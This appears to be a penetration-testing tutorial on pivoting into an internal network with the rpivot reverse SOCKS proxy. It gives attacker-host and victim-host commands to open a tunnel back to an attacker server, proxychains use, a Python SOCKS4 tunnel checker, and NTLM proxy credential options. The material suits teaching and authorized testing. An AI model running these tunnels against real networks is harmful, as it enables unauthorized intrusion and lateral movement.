Web Server Pivoting with Rpivot

Rpivot is a reverse SOCKS proxy tool written in Python for SOCKS tunneling. Rpivot binds a machine inside a network to an external server and exposes the client's local port on the server side.

Clone Rpivot

attacker@kali$ git clone https://github.com/klsecservices/rpivot.git

Running server.py from the Attack Host

attacker@kali$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

We need to transfer client.py to the target (the command below copies the whole rpivot directory).

attacker@kali$ scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Running client.py from Pivot Target (python2.7 required)

victim@ubuntu:~/rpivot$ python2.7 client.py --server-ip <attacker-ip> --server-port 9999

We can configure proxychains to pivot over the local SOCKS proxy on localhost:9050 that was started by the Rpivot Python server.

proxychains firefox-esr 172.16.5.135:80
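What proxychains does for firefox-esr in the command above is intercept its connect() calls and turn each one into a SOCKS4 CONNECT request to the rpivot listener on 127.0.0.1:9050 (the proxychains.conf entry must therefore be a socks4 line for that address and port). The Python 3 script below is an added example, not part of rpivot or of the original notes: it performs one such SOCKS4 CONNECT by hand so the tunnel can be verified before a browser is pointed at it. The proxy address, the target 172.16.5.135:80 and the function names are assumptions taken from the notes; the request and reply encodings follow the SOCKS4 protocol.

```python
"""
Check an rpivot SOCKS4 pivot by speaking the protocol directly.

Added example (not from rpivot or the original notes). Assumes the rpivot
server is listening on 127.0.0.1:9050 as in the notes above.
"""
import socket
import struct
from typing import Tuple

SOCKS4_VERSION = 0x04
SOCKS4_CMD_CONNECT = 0x01
SOCKS4_REPLY_GRANTED = 0x5A    # 90: request granted
SOCKS4_REPLY_REJECTED = 0x5B   # 91: request rejected or failed


def build_socks4_connect(dst_ip: str, dst_port: int, user_id: str = "") -> bytes:
    """Build a SOCKS4 CONNECT request: VN, CD, DSTPORT, DSTIP, USERID, NUL."""
    if not 0 < dst_port < 65536:
        raise ValueError("port out of range: %d" % dst_port)
    packed_ip = socket.inet_aton(dst_ip)  # raises OSError on a malformed dotted quad
    return (struct.pack("!BBH", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, dst_port)
            + packed_ip + user_id.encode("ascii") + b"\x00")


def parse_socks4_reply(reply: bytes) -> Tuple[bool, int]:
    """Parse the fixed 8-byte SOCKS4 reply and return (granted, reply_code)."""
    if len(reply) != 8:
        raise ValueError("SOCKS4 reply must be exactly 8 bytes, got %d" % len(reply))
    vn, cd = reply[0], reply[1]
    if vn != 0x00:
        # A SOCKS4 server answers with VN = 0; anything else means we are not
        # talking to a SOCKS4 listener (wrong port, or the server is not up).
        raise ValueError("unexpected reply version byte 0x%02x" % vn)
    return cd == SOCKS4_REPLY_GRANTED, cd


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes or raise if the proxy closes the connection early."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("proxy closed the connection during the handshake")
        buf += chunk
    return buf


def check_pivot(proxy_host: str, proxy_port: int, dst_ip: str, dst_port: int,
                timeout: float = 5.0) -> Tuple[bool, int]:
    """Open one SOCKS4 CONNECT through the local rpivot listener and report the result."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(build_socks4_connect(dst_ip, dst_port))
        return parse_socks4_reply(recv_exact(s, 8))


if __name__ == "__main__":
    # Values taken from the notes above; adjust them to the environment in use.
    ok, code = check_pivot("127.0.0.1", 9050, "172.16.5.135", 80)
    print("pivot to 172.16.5.135:80 %s (reply code 0x%02x)"
          % ("works" if ok else "FAILED", code))
```

A reply code of 0x5A means the rpivot client on the pivot host reached the internal target; 0x5B means the tunnel is up but the target could not be connected to (wrong address, filtered port, or the client has not connected back to the server yet).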

Some organizations have an HTTP proxy with NTLM authentication configured against the Domain Controller. In such cases, we can provide an additional NTLM authentication option to rpivot by supplying the domain, username and password that the NTLM proxy will accept.

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Proxy Authentication using NTLM:

https://learn.microsoft.com/en-us/openspecs/office_protocols/ms-grvhenc/b9e676e7-e787-4020-9840-7cfe7c76044a